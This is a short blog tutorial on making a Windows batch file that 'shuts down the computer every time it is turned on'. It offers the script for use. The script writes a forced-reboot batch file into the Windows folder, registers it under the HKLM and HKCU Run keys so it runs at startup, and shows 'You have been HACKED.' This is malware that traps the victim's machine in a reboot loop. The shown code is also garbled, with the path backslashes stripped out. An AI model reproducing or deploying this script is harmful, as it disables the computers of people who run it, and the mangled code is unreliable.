Shutdowns Computer Everytime It Is Turned On
Welcome back Computerlearningz viewer to I am going to share how to Shutdowns Computer Everytime It Is Turned On.
Step 1. Start notepad
Step 2. Copy and paste the below code
Step 3. Save as a .bat file
Step 1. Start notepad
Step 2. Copy and paste the below code
Code:
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add
hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE
Step 3. Save as a .bat file
Comments
Post a Comment